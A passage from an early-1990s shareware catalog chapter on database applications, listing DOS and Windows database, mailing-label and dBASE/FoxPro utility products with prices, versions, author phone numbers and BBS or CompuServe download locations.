Next update free plus 90 days free support + by phone/mail/BBS. Soft-bound manual set is $20. Unlimited- + user network licenses are $150. + Version: 4.2 (12-31-90) + User benefits: Next update free plus 90 days free support by + phone/mail/BBS. Soft-bound manual set is $20. Unlimited-user + network licenses are $150. + Look for: WAMPUM42.ZIP on BBSs (call 404-879-5985 to download it + at no charge); WAMPUM.ZIP in IBMAPP forum LIB 3 on CompuServe; + WAMPUM42.ZIP in IBM RTC LIB 0 on GEnie. + Download size: 360k + Description: + One of the data base granddaddy's of the shareware revolution, + WAMPUM provides the richest assortment of DBMS functions for + the lowest cost of any data base product in the world. WAMPUM + now can be loaded as a 20K TSR and supports PCX graphic fields. + + Chapter 5, "Database applications" 154 + + + + Provides fully relational, menu-driven DBMS support with + standard dBASE III data bases. Virtually all dBASE features are + supported including dBASE-compat. reports and labels. Includes + PowerBrowse, form letter support, and a phone dialer. + + Product: Wyndfields for Windows [***] + Needs: IBM PC, Windows 3.0 or better. 1.5MB RAM. + Author: Wyndware, 608-755-1628 + Registration: $99.00 + Registration benefits: Printed manual, master disks, upgrade + discounts. + Version: 1.0 (04-01-92) + User benefits: Printed manual, master disks, upgrade discounts. + Look for: WFW.ZIP on BBSs. + Download size: 390k + Description: + This powerful, relational database for Windows offers: + extensive search capabilities, unsurpassed date and time + tracking, multiple indexing, and math and string functions for + calculations. It easily handles the printing of mailing + labels, form letters, free-style reports, and detailed custom- + designed tabular reports. + + Relational capabilities are fully integrated into every aspect + of the program, allowing you to view, search, and report on + data from several related databases at once. + + Product: Zephyr + Needs: IBM PC, DOS 2.1 or better. Hard disk, 640k RAM. + Author: Ward Mundy Software, 404-237-9420 + Registration: $50.00 + Registration benefits: Soft-bound manual, next upgrade free, plus + 90 days free support by phone/mail/BBS. Unlimited-user network + license is $250. + Version: 2.0 (12-31-90) + User benefits: Soft-bound manual, next upgrade free, plus 90 days + free support by phone/mail/BBS. Unlimited-user network license + is $250. + Look for: ZEPHYR20.ZIP on BBSs (call 404-879-5985 to download it + at no charge); ZEPHYR.ZIP in IBMAPP forum LIB 3 on CompuServe; + ZEPHYR20.ZIP in IBM RTC LIB 0 on GEnie. + Download size: 720k + Description: + A fully relational, FoxPro-compatible DBMS for non-programmers. + It now can be loaded as a 20K TSR pop-up. 25 data bases can be + manipulated simultaneously. Its performance is roughly 16 times + that of dBASE III. + + Using a Mac-like interface, sophisticated applications can be + designed in minutes, not months. Reports, labels, list, and + form letters are a breeze to create. Has an integrated + windowing environment and includes a calendar, puzzle, and a + calculator. Supports a mouse! + + Chapter 5, "Database applications" 155 + + + + 5.2 Flat-file database managers + + See also: Database applications, Mailing label systems + (page 158). + + Product: Data Master [***] + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: RKS Software, Inc., 703-534-1726 + Registration: $39.00 + Registration benefits: Master disks, unlimited phone/fax/ + CompuServe/mail support, upgrade discounts. + Version: 2.2 (04-22-92) + User benefits: Master disks, unlimited phone/fax/CompuServe/mail + support, upgrade discounts. + Look for: DMASTE.ZIP on BBSs (call 617-354-8873 to download it at + no charge); DMASTE.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 327k + Description: + Allows you to create, modify, sort, report, and query dBase + files. Super Report Writer. Supports all laserjet and dot + matrix printers. Query Builder allows you to define, save, and + restore queries so you can work with any subset of records. + Form Letter utility allows you to create form letters which + merge data from dBase files. Finds duplicates, searches and + replaces any data. Mailing Label utility. Sums/averages data. + Frequency analysis. Supports unlimited number of records. Much + more.. + + Product: dLITE + Needs: IBM PC, DOS 2.1 or better. 160k RAM, or under 100K with + 64K of available EMS memory. + Author: Ward Mundy Software, 404-237-9420 + Registration: $25.00 + Registration benefits: Soft-bound, printed manual plus next + upgrade free and 90 days free technical support by phone/mail/ + BBS. + Version: 2.0 (07-01-91) + User benefits: Soft-bound, printed manual plus next upgrade free + and 90 days free technical support by phone/mail/BBS. + Look for: DLITE20.ZIP on BBSs (call 404-879-5985 to download it + at no charge); DLITE.ZIP in IBMAPP forum LIB 3 on CompuServe; + DLITE20.ZIP in IBM RTC LIB 0 on GEnie. + Download size: 240k + Description: + A programmable dBASE III-compatible desktop file manager with + several major enhancements. It is designed to be loaded as a + TSR which can be "popped up" from within any text-based DOS + application. + + While working with your favorite word processor or spreadsheet, + up to 10 different applications can be popped up and data can + be "pasted" into the foreground application. Using LOTUS-style + menus, sophisticated applications can be designed. A sample + mail list is included on the disk. + + Chapter 5, "Database applications" 156 + + + + Product: FASTFILE + Needs: IBM PC, DOS 2.0 or better. + Author: Interactive Mini Systems, Inc., 509-783-3829 + Registration: $70.00 + Registration benefits: Printed manual, master disks, phone/ + newsletter support, utilities. Shareware disks of other + programs. + Version: 5.33 (07-09-91) + User benefits: Printed manual, master disks, phone/newsletter + support, utilities. Shareware disks of other programs. + Look for: FAST-F.EXE (multiple files) on BBSs; FAST-F.EXE in + IBMAPP forum LIB 0 (multiple files) on CompuServe. + Download size: 60k + Description: + An extremely fast (FULL featured) database. Files are always + compressed. Great for laptop's and single disk computers. Many + features reduce data entry effort. Comes with Billing, + CheckBook/GL, Invoice, Client List (mail labels), Inventory, + Teacher's Gradebook, & FASTquiz (makes matching & multiple + choice tests & scrambles answers). Or create your own file + design. Hundreds recds/file and several files/disk. It's easy + to learn because same screen is used to enter, edit, find + records. + + Product: Information Please + Free-Form Database, Text Database. See full description on + page 163. + + Product: Layout + Office layout and equipment inventory. See full description on + page 215. + + Product: Music Manager for Windows + Music collection database. See full description on page 352. + + Product: NAMEBASE + Name/Address/Notes database w/mouse support. See full + description on page 222. + + Product: On This Day [***] + "What Happened On This Day in History?" See full description + on page 326. + + Product: PopDBF + 4K TSR for "Instant Access to X-Base Files" See full + description on page 166. + + Product: SR-Info + High-performance relational database language. See full + description on page 150. + + Product: STAFF-DBMS-PRODUCT-FAMILY + DBMS-Productivity Product Family. See full description on + page 151. + + Chapter 5, "Database applications" 157 + + + + Product: STAFF-DEVELOPER + Free RunTime Licence for Database Engines. See full + description on page 431. + + Product: STAFF-DIAL + Dialing with phone numbers stored in DBF file. See full + description on page 90. + + Product: STAFF-KICK + TSR DBMS compatible with dBASE III Plus. See full description + on page 152. + + Product: VIDEOCAT + Catalogs videocassette collections. See full description on + page 363. + + Product: WAMPUM + Menu-Driven dBASE-Compat. DBMS in a 20K TSR. See full + description on page 153. + + Product: Wyndfields for DOS [***] + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: Wyndware, 608-755-1628 + Registration: $70.00 + Registration benefits: Printed manual, tutorial, master disks, + upgrade discounts. + Version: 1.2 (08-01-91) + User benefits: Printed manual, tutorial, master disks, upgrade + discounts. + Look for: WFIELD12.ZIP on BBSs. + Download size: 220k + Description: + A powerful, general purpose database, offering extensive search + capabilities, unsurpassed date and time tracking, multiple + indexing, and math and string functions for calculations. It + easily handles the printing of mailing labels, form letters, + free-style reports, and detailed custom-designed tabular + reports. Pull-down menus and mouse support make it easy to + use. + + Product: Zephyr + FoxPro-Compatible DBMS for Non-Programmers. See full + description on page 154. + + + 5.3 Mailing label systems + + See also: Database applications, Flat-file database managers + (page 155); Utilities, Printer utilities, Envelope addressers + (page 63). + + Chapter 5, "Database applications" 158 + + + + Product: The Address Book Solution + Needs: IBM PC, DOS 2.0 or better. + Author: GSF Software & Solutions, 716-283-3804 + Registration: $20.00 + Registration benefits: Printed manual & disk; telephone support. + Version: 2.1 (05-31-91) + User benefits: Printed manual & disk; telephone support. + Look for: availability unknown on BBSs. + Download size: 180k + Description: + TSR Mailing/Address list program. Unlimited capacity. Sorts + data in user-defined order. Allows the selection of records + using a dBASE compatible filter. User-defined field names. + Carry forward from Add/Edit. Copies data into PC application. + Import/Export/Mail-Merge. Quick search and approximate search + methods. Output to printer or file. Store data on HD/diskette. + Programmable keys for use within TABS & other applications. 30 + user-defined categories. Displays previously added record. + + Product: CompUser [***] + A Rated Cyclopedia Of The Shareware Arena. See full + description on page 430. + + Product: Data Master [***] + Create/modify/sort/report/query dBase files. See full + description on page 155. + + Product: dbDIAL(tm) + 7k TSR Database/Dialer. See full description on page 90. + + Product: FASTMAIL + Needs: IBM PC, DOS 3.0 or better. 512k RAM. Hard Disk + Recommended. + Author: CACHE MICROSYSTEMS, 805-549-0532 + Registration: $17.00 + Registration benefits: 1 yr. Tech Support. + Version: 2.27 (06-01-91) + User benefits: 1 yr. Tech Support. + Look for: FSTML227.ZIP on BBSs (call 414-789-4210 to download it + at no charge). + Download size: 200k + Special instructions: Product distribution restricted to the + United States. + Description: + Easy to use menu driven mailing list program. Many features + include: add, edit, delete, display, two pass duplicate name + search, print names, print mailing labels on six different + formats, supports laser printer printers, statistics, names + printed in 10 differeent orders. Full screen editing and + database backup for multiple list support. Export data for mail + Merge, SDF or DBASE formats. Browse/subject searching on all or + specific fields. Full International Support + + Chapter 5, "Database applications" 159 + + + + Product: FlexBase + Create database, reports, letters, labels. See full + description on page 222. + + Product: GRAB Plus(r) + Envelope Addressor & Database. See full description on + page 63. + + Product: Label Master [***] + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: RKS Software, Inc., 703-534-1726 + Registration: $39.00 + Registration benefits: Master disks, unlimited phone/fax/ + CompuServe/mail support, upgrade discounts. + Version: 5.1 (04-22-92) + User benefits: Master disks, unlimited phone/fax/CompuServe/mail + support, upgrade discounts. + Look for: LMASTE.ZIP on BBSs (call 617-354-8873 to download it at + no charge); LMASTE.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 345k + Description: + This PC Magazine Editor's Choice mailing list program maintains + an unlimited number of records. Sorts automatically by name, + zip code, and any other data field. Supports all laserjet and + dot matrix printers. Prints all size mailing labels, Rolodex + cards, and envelopes. Bar codes. Report writer. Bulk mail + reports. Text editor for mailmerge form letters. Finds + duplicates, searches and replaces any data, checks state/Zip + Code accuracy. Query builder selects any subset of records. + Easy. + + Product: Mail Machine [***] + Print Envelopes and Labels on all LaserJets. See full + description on page 64. + + Product: Maillist / M-Label + Needs: IBM PC, DOS 2.0 or better. 512k RAM; hard disk strongly + recommended. + Author: R.K. West Consulting + Registration: $39.00 + Registration benefits: Latest version, printed manual, free mail + support, CIS support, 900-number phone support, upgrade + notices. + Version: 5.25/3.2 (01-29-92) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: MAIL*.ZIP (multiple files) on BBSs; MAIL*.ZIP in IBMAPP + forum LIB 9 (multiple files) on CompuServe. + Download size: 1k + Description: + Easy-to-use mailing list manager for business or personal use, + manages up to 99 separate lists. Prints labels, has automatic + duplicate checking, search by any field, "sound alike" search, + pop-up notepad for each record, optional password protection, + + Chapter 5, "Database applications" 160 + + + + compare and combine lists, restore deleted records, extra + fields for user coding, label customization and more. + + Product: MULTIFILE-XL + Needs: IBM PC, DOS 2.1 or better. + Author: H&P Software, 719-561-0810 + Registration: $29.95 + Registration benefits: Latest version with printed manual. + Version: 1.7 (08-22-91) + User benefits: Latest version with printed manual. + Look for: MULT-XL (multiple files) on BBSs. + Download size: 140k + Description: + A database for mailing labels, inventories, and maintenance + records. Each record has 6 fields at 50 characters per field. + Up to 4 search names can by typed to find records. Prints + special labels in color using EPSON JX-80 compatible printers. + No.of records limited by disk space. Sorted printouts limited + to 10,000 record files. Can be used as an external cust.& parts + or goods database with FAST INVOICE WRITER,(Disk #_____).Prints + 1-across labels only. Does date flagging, and numeric search- + total. + + Product: My Little Realm + Checking, charging, mailing label system. See full description + on page 249. + + Product: NAMEBASE + Name/Address/Notes database w/mouse support. See full + description on page 222. + + Product: Names & Dates + Address Book, Calendar, Mailing Label combo. See full + description on page 93. + + Product: PC-Names + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: WR Software, 415-930-0369 + Registration: $18.00 + Registration benefits: Latest version, phone support, printed + documentation, and vinyl address book cover. + Version: 1.32 (02-05-91) + User benefits: Latest version, phone support, printed + documentation, and vinyl address book cover. + Look for: PCNM132.ZIP on BBSs (call 415-937-0156 to download it + at no charge). + Download size: 240k + Description: + Holds unlimited names with generous address and notes areas. + Prints mailing labels (1-3 across), pocket-size (and any larger + size) address books, Rolodex cards (2 sizes), envelopes + (optional return address), 5 more reports. Telephone autodial, + sort by name or Zip code, Mail Merge, export, import, + + Chapter 5, "Database applications" 161 + + + + categories for grouping names, duplicate search, custom label + sizes, support for laser and dot matrix printers. + + Product: PhoneBook [***] + Manage lists of names, addresses, & phone #'s. See full + description on page 80. + + Product: Plain Vanilla Labels + Needs: IBM PC, DOS 2.0 or better. Printer. + Author: Rosewood Software, 416-284-6119 + Registration: $10.00 + Registration benefits: A code will be sent which will remove + exhortations to register. + Version: 3.13 (12-14-91) + User benefits: A code will be sent which will remove exhortations + to register. + Look for: PVLAB313.ZIP on BBSs; PV313.ZIP in IBMAPP forum LIB 10 + on CompuServe. + Download size: 98k + Description: + Plain Vanilla Labels is an easy-to-use label program which uses + standard 3 1/2 by 15/16 inch tractor feed labels. Labels can be + stored in up to 10 files, or a label can be printed without + saving the data. Each label file can have its own set of macros + to make data entry easier. Data can be indexed at any point in + each label. Remarks can be "hidden" in any part of the label so + that they can be seen by the user but not printed on the label. + The program has a sophisticated search function. + + Product: PostCardMaster + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Registration benefits: Master disks, phone/BBS/mail support. + Shareware disks of other programs. + Version: 3.51 (10-01-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: PCM351.ZIP on BBSs (call 317-784-2147 to download it at + no charge); PCM351.ZIP in IBMAPP forum LIB 9 on CompuServe. + Download size: 188k + Description: + Designed to help Users compose post cards and maintain + addresses. The Address feature has entries for name, + salutation, code, three line address and a line for ZipCode, + telephone number, and a remarks line. Print outs include + listings of the addresses, address labels, 3X5 cards, 4X6 post + cards or Roladex cards AND response cards that pre print a + response from the addressee to mail to the originator. Post + cards cost 1/3 less than a letter and in some cases are equally + as good ie meeting notices. + + Chapter 5, "Database applications" 162 + + + + Product: Public Address + Needs: IBM PC, DOS 2.1 or better. 384k RAM. Hard disk + recommended. + Author: Paradise Programming, 206-352-9863 + Registration: $35.00 + Registration benefits: Printed manual, master disks, phone/mail + support, one free update. + Version: 2.1 (03-10-92) + User benefits: Printed manual, master disks, phone/mail support, + one free update. + Look for: PUB_ADD.EXE on BBSs (call 206-943-1513 to download it + at no charge); PUB_AD.EXE in IBMAPP forum LIB 9 on CompuServe. + Download size: 140k + Description: + Exceptionally easy to use compact Address Database. Totally + menu driven! SEARCHES and PRINTS on seven fields. Prints + Labels, Envelopes, Phone book (sorted by Name or Business), + WordPerfect mail merge file (9 fields), Report, all output can + go to an ASCII file, and it will even dial your phone. Prints + return address on envelopes. Sorts by Name or Zip+4. Unlimited + records, groups. Great for note-book computers or anywhere disk + space is at a premium. Compact but full featured! Supports all + printers. + + Product: Simply Labels + Free form label program with many features. See full + description on page 431. + + Product: SR-Info + High-performance relational database language. See full + description on page 150. + + Product: STAFF-BASE + Flat File DBMS with relations to other DBF's. See full + description on page 151. + + Product: STAFF-DBMS-PRODUCT-FAMILY + DBMS-Productivity Product Family. See full description on + page 151. + + Product: STAFF-KICK + TSR DBMS compatible with dBASE III Plus. See full description + on page 152. + + Product: Zephyr + FoxPro-Compatible DBMS for Non-Programmers. See full + description on page 154. + + + 5.4 File format translators + + See also: Utilities, File utilities, File conversion (page 38). + + Chapter 5, "Database applications" 163 + + + + Product: dPerfect Merge [***] + Converts xBase to Word Perfect secondary file. See full + description on page 38. + + Product: STAFF-BASE + Flat File DBMS with relations to other DBF's. See full + description on page 151. + + Product: STAFF-DBMS-PRODUCT-FAMILY + DBMS-Productivity Product Family. See full description on + page 151. + + Product: STAFF-UTIL + Utilities for the maintenance-update of DBFs. See full + description on page 168. + + + 5.5 Freeform/text database managers + + Product: Data Master [***] + Create/modify/sort/report/query dBase files. See full + description on page 155. + + Product: dtSearch + Needs: IBM PC, DOS 3.2 or better. Hard disk, 384k RAM. + Author: DT Software, Inc. + Registration: $59.00 + Registration benefits: Printed manual; technical support by mail + or CompuServe for one year (telephone support is available + through a 900 number). + Version: 1.1 (08-14-91) + User benefits: Printed manual; technical support by mail or + CompuServe for one year (telephone support is available through + a 900 number). + Look for: availability unknown on BBSs; DTSRCH.EXE in IBMAPP + forum LIB 2 on CompuServe. + Download size: 290k + Description: + A fast, powerful, and easy to use document search and retrieval + program. Search features: indexed and unindexed searches, + boolean logic (AND, OR, NOT), proximity and phrase searches, + and segment searches. Indexing features: up to 15,000 + documents per index, unlimited number of indexes. Other + features: network support, clipboard, application "launch." + + Supports WordPerfect 5.0 and 5.1, WordStar, WordStar 2000, + Word, Word for Windows, RTF, Multimate Advantage II and + Multimate 4. + + Product: FlexBase + Create database, reports, letters, labels. See full + description on page 222. + + Chapter 5, "Database applications" 164 + + + + Product: Information Please + Needs: IBM PC, DOS 2.1 or better. 384k RAM. + Author: TexaSoft, 214-291-2115 + Registration: $49.00 + Registration benefits: Printed Manual, new versions at discount, + newsletter. + Version: 2.07 (06-26-91) + User benefits: Printed Manual, new versions at discount, + newsletter. + Look for: IP207.ZIP on BBSs; IP207.ZIP in IBMAPP forum LIB 3 on + CompuServe. + Download size: 270k + Description: + This text storage and retreival program allows you to store and + retreive full-text informaton such as memos, catalogues, + briefs, letters, articles, invoices, manuals, product + descriptions -- be creative! IP also supports PCX graphics so + you can relate a graphic image to a text entry. PC Focus says + "The potential for this program is unlimited ... IP is + simplicity itself." + + + 5.6 Keypunch programs + + Product: KP5 + Needs: IBM PC, DOS 2.0 or better. 350k RAM. + Author: Peter Charpentier + Registration: $85.00 + Registration benefits: Printed manual, unlimited CompuServe/mail + support, free upgrading. + Version: 5.07 (01-27-92) + User benefits: Printed manual, unlimited CompuServe/mail support, + free upgrading. + Look for: KP5???.ZIP (multiple files) on BBSs; KP5???.EXE in + IBMAPP forum LIB 15 (multiple files) on CompuServe. + Download size: 275k + Description: + Used by professional, 'heads-down' data entry operators to + enter and verify batches of data from survey research + questionnaires and other forms. Supports large (32k) records + and has no limit on file size. Features include: rapid file + setup, simple drop-down menu interface, two-level range + checking, automatic duplication between and within records, + password protection, session logging. + + + 5.7 Database utilities + + Product: Data Master [***] + Create/modify/sort/report/query dBase files. See full + description on page 155. + + Chapter 5, "Database applications" 165 + + + + Product: PCFDial + Powerful 7k swapping TSR voice autodialer. See full + description on page 89. + + Product: SNAP! + Needs: IBM PC, DOS 3.0 or better. + Author: Walter J. Kennamer + Registration: $0.00 + Registration benefits: Unknown. + Version: 5.0 (01-10-92) + User benefits: Unknown. + Look for: availability unknown on BBSs; SNP501.ZIP in FOXFORUM + forum LIB 6 on CompuServe. + Download size: 250k + Description: + Prepares extensive technical documentation for FoxPro, dBASE, + and Clipper systems. It formats source code and adds keyword + capitalization, indentation, program headings and much more. + Also prepares a series of reports including: action diagrams; + tree diagram; variable cross reference; data dictionary; index + file summary; report form layouts. It makes old code look new + again! + + + 5.8 Software tools + + See also: Programming, Languages (page 287); Programming, + Software tools (page 299). + + 5.8.1 For multiple programs + + Product: 4Print + Paper saving utility for LaserJets & DeskJets. See full + description on page 54. + + Product: Recap + Needs: IBM PC, DOS 2.0 or better. 412k RAM. + Author: R.K. West Consulting + Registration: $15.00 + Registration benefits: Latest version, free mail support, CIS + support, 900-number phone support, upgrade notices. + Version: 2.3 (01-01-92) + User benefits: Latest version, free mail support, CIS support, + 900-number phone support, upgrade notices. + Look for: RECAP*.ZIP on BBSs; RECA*.ZIP in IBMAPP forum LIB 3 on + CompuServe. + Download size: 1k + Description: + It can be very frustrating to find that some of your database + records have been entered in all caps when you didn't want them + that way, or that some have not been entered in all caps when + you did want them that way! Goes through any dBase-III + compatible database file and make the desired adjustments. This + program can save you from hours of re-entering data. + + Chapter 5, "Database applications" 166 + + + + 5.8.2 For dBASE + + Product: dLITE + Memory-res dBASE-Compat Desktop File Manager. See full + description on page 155. + + Product: dPerfect Merge [***] + Converts xBase to Word Perfect secondary file. See full + description on page 38. + + Product: KWIKSTAT + Statistical Data Analysis. See full description on page 281. + + Product: PopDBF + Needs: IBM PC, DOS 2.0 or better. 4k RAM if used in "TSR + swapping" mode; 46k otherwise. + Author: Bowen Software, 309-699-0950 + Registration: $35.00 + Registration benefits: Printed manual, phone/CompuServe/mail + support. + Version: 4.0 (08-01-91) + User benefits: Printed manual, phone/CompuServe/mail support. + Look for: POPDBF??.ZIP on BBSs (call 414-789-4210 to download it + at no charge); POPDBF.ZIP in IBMAPP forum LIB 3 on CompuServe. + Download size: 130k + Description: + A 4K TSR that provides "Instant Access to X-Base Files". Here + are just a few of its features: + * Easily select ANY database, any drive + * Append, browse, delete, and edit records + * Delete, pack and zap databases + * Lightning fast search of entire record or selected + field(s) + * View structure + * Print structure or records (browse or edit format) to a + printer or file + * View index expressions (.IDX, .NDX, .NTX) + * Network Compatible + * Context sensitive help + + 5.8.2.1 dBASE III specific + + Product: Badge-O-Magic + LaserJet Nametags Using Any dBASE III File. See full + description on page 54. + + Product: Data Master [***] + Create/modify/sort/report/query dBase files. See full + description on page 155. + + Chapter 5, "Database applications" 167 + + + + Product: dBF-View + Needs: IBM PC, DOS 3.0 or better. 512k RAM. Hard disk + recommended. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $20.00 + Registration benefits: Printed Manual, latest version of + software, and phone support. + Version: 1.0 (06-01-91) + User benefits: Printed Manual, latest version of software, and + phone support. + Look for: availability unknown on BBSs; DBVIEW.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 123k + Description: + This dBASE III file viewer lets you see the database structure + and/or the contents. It is possible to open a DBF file with a + selected Index. Included utilities: + COPIAS A copy program that optimizes diskette usage + FREE Displays the free Disk space + FRAM Displays the amount of free RAM + FL A listing program + SEAREP Search/replaces text in many files + FQ Batch enhancer + FDUMP File Dumper (EBCDIC,HEX,ASCII) + + Product: STAFF-BASE + Flat File DBMS with relations to other DBF's. See full + description on page 151. + + Product: STAFF-DBMS-PRODUCT-FAMILY + DBMS-Productivity Product Family. See full description on + page 151. + + Product: STAFF-DEVELOPER + Free RunTime Licence for Database Engines. See full + description on page 431. + + Product: STAFF-DIAL + Dialing with phone numbers stored in DBF file. See full + description on page 90. + + Product: STAFF-GRAF + Graphics for Data stored in dBASE III format. See full + description on page 332. + + Product: STAFF-KICK + TSR DBMS compatible with dBASE III Plus. See full description + on page 152. + + Product: STAFF-MASK + Custom designed RETRIEVE/EDIT/ADD/DELETE Mask. See full + description on page 152. + + Chapter 5, "Database applications" 168 + + + + Product: STAFF-REPORT + Relational Report Generator for DBF files. See full + description on page 173. + + Product: STAFF-UTIL + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $39.00 + Registration benefits: Printed manual, latest version on disk, + phone support. + Version: 2.0 (01-01-91) + User benefits: Printed manual, latest version on disk, phone + support. + Look for: availability unknown on BBSs; STFUTL.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 170k + Special instructions: Product distribution restricted to the + United States. + Description: + Set of utilities for DBF maintenance: DBF file size + optimization; Breaking down DBF files according to record + number, in equal size parts, maximum capacity per file; Backup + & restore of DBF files; File compression & decompression; + Encryption & decryption; Viewing DBF files; File translation to + and from: LOTUS 123, MULTIPLAN, SUPERCALC, dBASE II, DIF, CSV, + ASCII, Wordstar Mailmerge; Updating of the information stored + in a DBF file by using as input another DBF file with a common + structure. + + 5.8.3 For FoxPro/FoxBASE+ + + Product: DB2DOC + Needs: IBM PC, DOS 2.0 or better. FoxPro 1.02 or FoxBASE+ 2.10 + or later. + Author: Carlos Berguido, 707-762-9067 + Registration: $10.00 + Registration benefits: Master disk, one year phone support. + Version: 2.0 (06-30-91) + User benefits: Master disk, one year phone support. + Look for: DB2DOC.ZIP on BBSs (call 908-735-2180 to download it at + no charge); DB2DOC.ZIP in FOXFORUM forum LIB 6 on CompuServe. + Download size: 12k + Description: + Inspects all DBF files in the current directory and quickly + generates/updates a FoxBASE+/FoxPro dbf file, "DB2DOC.ddb". + Menus are provided to BROWSE the documentation database to add + application, file, and field descriptions, and record counts. + + Generates file and field descriptions and statistics to screen, + printer, or disk file for any or all dbf files. Source code + included. + + Chapter 5, "Database applications" 169 + + + + Product: DB2PRG + Needs: IBM PC, DOS 2.0 or better. FoxPro 1.02 or FoxBASE+ 2.10 + or later. + Author: Carlos Berguido, 707-762-9067 + Registration: $10.00 + Registration benefits: Master disk, one year phone support. + Version: 2.1 (06-30-91) + User benefits: Master disk, one year phone support. + Look for: DB2PRG.ZIP on BBSs (call 908-735-2180 to download it at + no charge); DB2PRG.ZIP in FOXFORUM forum LIB 6 on CompuServe. + Download size: 8k + Description: + Inspects all DBF files in the current directory and quickly + generates a FoxBASE+/FoxPro program file, "MAKEDBF.prg", + containing the commands needed to create all or any of your DBF + structures. You may add "DO MAKEDBF" to the initialization + process of your application as suggested in the source code. + + Product: QQUERY (All Fox versions) + Needs: IBM PC, DOS 2.0 or better. FoxPro (1.02 or 2.0) or + FoxBASE+ 2.10. + Author: Carlos Berguido, 707-762-9067 + Registration: $10.00 + Registration benefits: Master disk, source code, and the right to + use it in distributed applications. + Version: 2.10E (08-01-91) + User benefits: Master disk, source code, and the right to use it + in distributed applications. + Look for: QQUERY.ZIP on BBSs (call 908-735-2180 to download it at + no charge); QQUERY.ZIP in FOXFORUM forum LIB 6 on CompuServe. + Download size: 230k + Description: + Helps users create, store, modify, and replay logical + rd + expressions. When combined with Fox or 3 party report + generators, it makes a simple yet powerful query tool. + + For Fox database application developers, it adds powerful, + reusable, ad hoc record selection to developer designed data + and report formats. Has complete online help. + + Chapter 5, "Database applications" 170 + + + + Product: QQUERY (FoxBASE+ 2.10 version) + Needs: IBM PC, DOS 2.0 or better. FoxBASE+ 2.10. + Author: Carlos Berguido, 707-762-9067 + Registration: $10.00 + Registration benefits: Master disk, source code, and the right to + use it in distributed applications. + Version: 2.10E (08-01-91) + User benefits: Master disk, source code, and the right to use it + in distributed applications. + Look for: availability unknown on BBSs; QQFBAS.ZIP in FOXFORUM + forum LIB 6 on CompuServe. + Download size: 100k + Description: + Helps users create, store, modify, and replay logical + rd + expressions. When combined with Fox or 3 party report + generators, it makes a simple yet powerful query tool. + + For Fox database application developers, it adds powerful, + reusable, ad hoc record selection to developer designed data + and report formats. Has complete online help. + + Product: QQUERY (FoxPro 1.02 version) + Needs: IBM PC, DOS 2.0 or better. FoxPro 1.02. + Author: Carlos Berguido, 707-762-9067 + Registration: $10.00 + Registration benefits: Master disk, source code, and the right to + use QQuery in distributed applications. + Version: 2.10E (08-01-91) + User benefits: Master disk, source code, and the right to use + QQuery in distributed applications. + Look for: availability unknown on BBSs; QQFPR1.ZIP in FOXFORUM + forum LIB 6 on CompuServe. + Download size: 100k + Description: + Helps users create, store, modify, and replay logical + rd + expressions. When combined with Fox or 3 party report + generators, QQuery makes a simple yet powerful query tool. + + For Fox database application developers, it adds powerful, + reusable, ad hoc record selection to developer designed data + and report formats. Has complete online help. + + Chapter 5, "Database applications" 171 + + + + Product: QQUERY (FoxPro 2.0 version) + Needs: IBM PC, DOS 2.0 or better. FoxPro 2.0. + Author: Carlos Berguido, 707-762-9067 + Registration: $10.00 + Registration benefits: Master disk, source code, and the right to + use it in distributed applications. + Version: 2.10E (08-01-91) + User benefits: Master disk, source code, and the right to use it + in distributed applications. + Look for: availability unknown on BBSs; QQFPR2.ZIP in FOXFORUM + forum LIB 6 on CompuServe. + Download size: 100k + Description: + Helps users create, store, modify, and replay logical + rd + expressions. When combined with Fox or 3 party report + generators, it makes a simple yet powerful query tool. + + For Fox database application developers, QQuery adds powerful, + reusable, ad hoc record selection to developer designed data + and report formats. Has complete online help. + + 5.8.4 For other + + Product: Btr Watch + Needs: IBM PC, DOS 3.1 or better. BTRIEVE.EXE or BREQUEST.EXE + and a Btrieve application. + Author: Informative Technologies, 202-675-4528 + Registration: $29.00 + Registration benefits: Latest version of Btr Watch / One year of + support / Bonus disk of other software to evaluate / $7 off + subscription to Shareware Magazine. + Version: 1.0 (09-15-91) + User benefits: Latest version of Btr Watch / One year of support + / Bonus disk of other software to evaluate / $7 off + subscription to Shareware Magazine. + Look for: PROG. CORNER on BBSs (call 301-596-1180 to download it + at no charge); BWCH10.ZIP in NOVA forum LIB 14 on CompuServe. + Download size: 115k + Description: + This memory resident Btrieve debugger traces the interaction + between your application and Btrieve files. Monitors calls to + Btrieve and makes an entry into a log file every time a Btrieve + file is accessed. The time, date, file name, operation, + duration, and result of each access is recorded. Network- + compatible and can trace file accesses from multiple + workstations. Catches files that have been opened multiple + times without closing them. + + Product: SNAP! + Prepares technical docs for dBASE, FoxPro. See full + description on page 165. + + Chapter 5, "Database applications" 172 + + + + Product: STAFF-UTIL + Utilities for the maintenance-update of DBFs. See full + description on page 168. + + Product: Workbase + Needs: IBM PC, DOS 2.0 or better. 512k RAM, some knowledge of + Clipper or dBase. + Author: R.K. West Consulting + Registration: $49.00 + Registration benefits: Latest version, printed manual, free mail + support, CIS support, 900-number phone support, upgrade + notices. + Version: 3.24 (01-01-92) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: WORK*.ZIP on BBSs; WORK*.ZIP in IBMPRO forum LIB 7 on + CompuServe. + Download size: 1k + Description: + Clipper developers: this is an interactive environment for over + 90 "dBase language" commands, including some that may be new to + you. Create, append, edit, browse, restore from and save to MEM + files, display memory, display structure, modify structure -- + many other commands for development, troubleshooting and + support. Includes simple PRG interpreter. If your applications + use dBase-compatible files, you'll love this handy utility. + Unlike other "dot prompt" programs, this one works! + + + 5.9 Other + + Product: Find Area Code (FAC) + 7K TSR ASCII freeform popup areacode 